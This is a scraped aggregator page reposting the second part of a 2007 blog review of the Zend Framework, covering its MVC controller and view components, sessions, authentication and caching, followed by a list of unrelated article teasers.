    We've been a free service since 1999 and now rely on the generous contributions of readers like you. If you'd like to help support our work, please join the hundreds of others and  become an fxinsider member.

    展开全文
  • A review of the Zend Framework - Part 2

    千次阅读 2007-07-05 11:42:00
    http://blog.octabox.com/2007/06/04/a-review-of-the-zend-framework-part-2/[This is Part two of a three part review. Part one can be found here]When I wrote the previous part of this review, coverin
    http://blog.octabox.com/2007/06/04/a-review-of-the-zend-framework-part-2/
    

    [This is Part two of a three part review. Part one can be found here]

    When I wrote the previous part of this review, covering the Registry and Database classes of the Zend Framework, the Framework was still at version 0.9.3 Beta. It has since reached version 1.0.0 Release Candidate, and interestingly enough, most of the changes affect the components I’ll be reviewing this time.

    Zend_Controller, Zend_View - Model-View-Controller architecture

    A Model-View-Controller implementation seems to be all the rage these days in web-development, and for good reason (though some wonder whether it realy is so). Briefly on the Model-View-Controller pattern - In a (web) application of growing complexity, it becomes paramount to separate logic from the presentational layer, allowing logic to be changed without requiring change in the presentational layer. Anyone who has developed for web in a straightforward manner, mixing client side code (e.g PHP) and presentational code (HTML, CSS), probably has noticed an increasing difficulty in making changes to a script as it grows in size and complexity.
    In a manner of speaking, Style Sheets apply the same logic behind the MVC pattern - allowing separation of information from styling, and for reusability of styling code (Style Sheets). For more on the MVC pattern read the Wikipedia page or this article on PHPwact.

    The Zend Framework provides the View and Controller parts of the MVC scheme, with the Model layer provided by the web developer according to the needs of a specific web-development project. Most models involve database access, and the Zend_Db_Table provides the building blocks for such models as I’ve mentioned in Part 1.

    The Zend_Controller class hierarchy revolves around bootstrapping your application through a single script and instancing a Front Controller in that script (Zend_Controller_Front). The front controller handles incoming requests and dispatches them to Actions in Action Controller scripts (Zend_Controller_Action), Actions simply being methods (class functions) inside such controller scripts.

    The Zend_Controller comes complete with its own Rewrite class (Zend_Controller_Router_Rewrite) which replaces usage of a server implemented rewrite module (such as Apache’s) for all purposes but the initial bootstrapping.

    The Controller scheme of the Zend Framework also provides Request and Response objects representing the incoming server requests (Http or otherwise) and the corresponding responses, and allows to make modifications and retrieve information before and after the dispatching process.

    Also available are Action Helpers and Controller Plugins which allow for the reuse of common code in controller scripts without having to subclass the original Zend_Controller_Action class.

    All in all the Controller implementation of the Zend Framework is one of the most complete I’ve seen and certainly the most agile and extendable, however its not without its problems. Up until recently, the View integration in the Controller scripts have been rather non-existent. In previous versions of the framework, one would have to manually set up Views and their scripts which lead to some code redundancy inside a specific controller. In the latest versions, efforts were made to allow for a more streamlined integration of the View class in the controllers, providing several shortcut methods to instancing and rendering a View but it’s still not as mature as in some of the other PHP frameworks available.

    The Zend_View class provides the View in the MVC scheme. There are no provided templating systems in the framework, so basic usage through the Zend_View would be rendering templates composed of HTML and inline PHP code. While this is my preferred method of operation, those who feel the need can integrate various templating systems with the Zend_View (here’s a nice article on integrating Smarty with Zend_View).

    The Zend_View uses the __get() and __set() magical methods to dynamically insert and retrieve variables / objects in a View. Standard course of action would be to inject some data in the View through the Controller script using a model, and retrieve it for output inside the View (which is basically what the MVC pattern is all about).

    Of course, the Zend_View comes replete with its own helpers scheme, which is little more than convenience method for calling up external classes called helpers. Since the framework provides only some basic form inputs classes at this point, the task of creating user interface classes is left to the web-developer. It remains to be seen if this would be remedied in the future, since other frameworks have provided an entire range of user-interface helpers, including some javascript and ajax integration.

    Through the development of the Octabox project, I’ve created my own user-interface class hierarchy for abstraction of HTML and JavaScript operations, including a full set of Widget based classes that perform more advanced operations (such as the creation of the Octabox styled window and dialog boxes, the creation of the Tab based menues, custom select boxes and scrollbars and so forth), as the basis of the Octabox API, so I’m not holding my breath for any breakthrough helper design in the Zend Framework (and there is no indication one is forthcoming).

    Zend_Session - Handling sessions

    Sessions in the web environment allow maintaining state over Http, which is basically a stateless protocol. Users can be assigned unique identification strings which are used to identify them as they traverse a web site, and allow associating data with specific users (which is saved on the server).

    Zend_Session encapsulates PHP session handling in an Object Oriented manner. Namespaces are used to segregate information, helping to avoid collisions (loss of data by accidentally overwriting it, a common occurrence with sessions) by promoting the use of different namespaces for different sets of information, and session namespace locking (preventing modifications to a specific namespace). A short blog on the perils of using sessions can be found here and another one on session security issues can be found here.

    Also provided are several useful utility functions such as session ID regeneration, session expiration settings and session termination methods. All in all, Zend_Session helps avoid some common pitfalls when using sessions by using Object Oriented architecture without increasing complexity, and is a welcome addition to most a PHP developer’s library. It is used internally by Zend_Auth which I will cover next -

    Zend_Auth - Authentication

    Authentication in the web environment sense means confirming that a user is who he claims to be based on given credentials. The most common usage of authentication is via a Log-in form, where a user name and password are usually given (i.e. credentials), and are confirmed against credentials information on the server (i.e. authentication).

    Zend_Auth provides several backends for authenticating (database, filesystem) as well as common methods for Http authentication (basic and digest), a full review of which is out of scope for this blog. Suffice to say Authentication results (called identity) can be stored into persistent storage, the default being using sessions (Zend_Auth uses Zend_Session internally in order to achieve session persistence). Authentication results can be a database row for example, which can include more than just the user name and password (Email address and user ID for example), the persistence of which can be very useful.

    The persistence of identity via Zend_Auth is further enhanced by the fact that Zend_Auth is a singleton pattern implementation, meaning authentication results (i.e success/failure of which and identity persistence) can be called up easily from any script in your web application.

    Zend_Auth and Zend_Session is a perfect example of two Zend Framework components working together without relying exclusively on one another (loose coupling, important!).

    Zend_Cache - Data caching

    Cache (pronounced cash) in computer terminology means storage of data which was computed / fetched previously. The purpose of cache is to provide faster access to commonly used data and to avoid the resource data fetching / calculation. Besides Http requests, which can’t be avoided (unless, of course, you do not wish traffic to your site), the two major resource consuming operations for a traditional web server are database queries and server side script processing (i.e. PHP). By caching data generated from such operations (such as dynamically generated web pages or database query results) into readily available data (such as into system memory or local file-system), much load can be taken off a web server (which is good for business).

    Zend_Cache is the Zend Framework answer to PHP based caching solution. It operates by delegating the information gathering to a front-end class and caching the information using a back-end class.
    Provided front-end class include a class for capturing output (using PHP’s output buffering), classes for caching function calls and object instances and classes for caching file-parsing results (such as XML) and complete HTML pages.
    Back end classes for the cache result persistence are provided for file storage (basically turning dynamic content into static one for the duration of the cache), SQLite storage (a database implementation that is not actually an independent system process), memcached storage (a high performance object caching system), APC backend (Alternative PHP Cache, which is a PHP extension) and Zend Platform caching (which requires the Zend Platform to be installed obviously).

    The operation of the cache is very simple - You gather the information you want cached using a cache front-end, and store it via a cache back-end. A check for cache existance is then added before the information is generated, and if the cache is found (cache hit) it is retrieved from the cache storage back-end instead of being dynamically generated.

    Having used Zend_Cache for some time now, I feel that many PHP developers who might have shunned from caching for simpler projects because of lack of understanding and/or lack of motivation (I know I had this mindset until not so long ago) could definitely use this class as a standalone in almost every project, greatly enhancing their web applications performance.

    Next week in the last section of this review, I will go over the Zend_Filter / Zend_Validate combo, Zend_Search_Lucene (a real gem!) and wrap up my impressions of the Zend Framework.

    Comments, questions and clarifications are welcomed and appreciated.

     
    展开全文
  • A review of the Zend Framework - Part 1

    千次阅读 2007-07-05 11:39:00
    URL:http://blog.octabox.com/2007/05/25/a-review-of-the-zend-framework-part-1/[Note: Due to its length, this review has been split up in three. This is Part 1 of a three part review, Part 2 can be
  • Hidden Secrets of the VFP IDE, Part 1

    千次阅读 2004-08-03 14:47:00
    Hidden Secrets of the VFP IDE, Part 1 Cathy Pountney FoxPro has always had several different ways to do the same thing. How many times have you looked over the shoulder of another developer and
  • 内容简介1 RFID标签 (RFID Tags)本章的重点是RFID标签,提供了RFID的概述和标签...Radio Frequency IDentification (RFID) has a long history and is part of the technological revolution both current and past.
  • The architecture of the RUPFigure 2 shows the overall architecture of the Rational Unified Process. Theprocess has two dimensions:-The horizontal dimension represents time and shows the phase and it
  • Using IBM Patterns for e-business during inceptionKey goals of the RUP inception phase are:- A vision that establishes the key needs- A business case that justifies the investment- Initial budget ...
  • None of the component files may be redistributed for profit or as part of another software package without express written permission of the BergSoft. Redistribution of any of the component files in ...
  • 2. Next, search for (for the 64 bits driver): HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\MSDTC\MTxOCI  Make sure the same values as above are entered. 3. Reboot your server.   ...
  • Next Round

    千次阅读 2016-11-02 11:08:22
    Next Round time limit per test 3 seconds memory limit per test 256 megabytes input standard input output standard output "Contestant who earns a score equal to or gre
  • next. js_如何更改Next.js应用程序端口

    千次阅读 2020-08-31 12:06:45
    jsI’ve been asked how to change the HTTP port of an app built using Next.js, when you are running it locally. By default the port is 3000, but that’s a commonly used port and perhaps you have an...
  • 在myeclipse利用ant构建时遇到The path xxx appears to be part of Subversion 1.7 (SVNKit 1.4) or greater解决办法 想项目开发过程中,一直部署项目到时手动部署,把项目发布到自己的tomcat,然后把...
  • 浅析MultipartResolver

    千次阅读 2018-05-10 16:03:04
    处理文件是大多数项目...一、使用multipartResolver解析文件在Spring的配置文件中加入如下文件解析器&lt;bean id="multipartResolver" class="org.springframework.web.multipart.commons.Com...
  • Part III explores system performance and applications e g MIMO Over the air testing electromagnetic safety etc ">电子书:LTE Advanced and Next Generation Wireless Networks Channel Modelling and ...
  • It just need to increment the id to get the url of the next page. Data Schema Here are the schema of the data needed to analyse: Songs song-id song-name song-hot album-id ...
  • Part 1: 如何把Power BI 嵌入到sharepoint 网站本文是转载,转自:http://rolandoldengarm.com/index.php/2016/04/27/part-1-how-to-embed-powerbi-in-a-sharepoint-site/One of the most requested features for ...
  • IntroductionIn Part 1 of my on-going series on What’s New in Windows Server 2012 Networking, I touched briefly on the topic of Data Center Bridging (DCB). It’s also a part of the low latency ...
  • IntroductionI’ve been hearing from a number of network admins who expect to be evaluating the benefits of upgrading their server operating system in the next year. Everyone wants to know whether the ...
  • OK, let’s look at the next portion of the index block dump.   Following the hex dump of the block (as we ended Part I of the series) is the second part of the block header (see below):  Block ...
  • This Part is one piece of a Standard that ...Apple, Barclays Capital, BP, The British Library, Essilor, Intel, Microsoft, NextPage, Novell, Statoil, Toshiba, and 11 the United States Library of Congress
  • Development projects for service-oriented solutions are, on the surface, much like any other custom development projects for distributed applications. Services are designed, developed, and deployed
  • Analyzing PDF Malware - Part 2

    千次阅读 2014-04-10 11:11:47
    As the title states, this is the second part of Analyzing PDF Malware. If you haven’t read the first part you can find it here. Go ahead and read it now if you haven’t already, we’ll
  • Analyzing PDF Malware - Part 3B

    千次阅读 2014-04-10 11:17:24
    Down that dusty trail…...As the big blue letters above state, this is part 3B of the Analyzing PDF Malware series. If you haven’t read any of the preceding posts you can find them here: Part1, Part2,
  • 我的编程能力属于典型的眼高手低,next_batch这样一个极为常见的问题,我都有些困难,特留这篇博客用来警示自己。 def next_batch(train_data, train_target, batch_size): index = [ i for i in range(0,len...
  • Analyzing PDF Malware - Part 3A

    千次阅读 2014-04-10 11:15:50
    When we last left our ...This is the third part of the Analyzing PDF Malware series. If you haven’t read the first and second parts you can find them here and here respectively. We will be bui
  • Microsoft Visual C++ 4.2 (vc4.2) part 3 老古董啦,呵呵 安装方法 To Install: uncompress files to the MSDEV directory. Run Setup. Enter all 4's for the CD Key (or whatever else you want). Select ...
  • SharePoint's learning emphasize details. During the process of customizing my first visual web part, sometimes the lower mistakes made me almostly crazy. Next I'll show you the steps to customize a

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 116,445
精华内容 46,578
关键字:

nextpartthe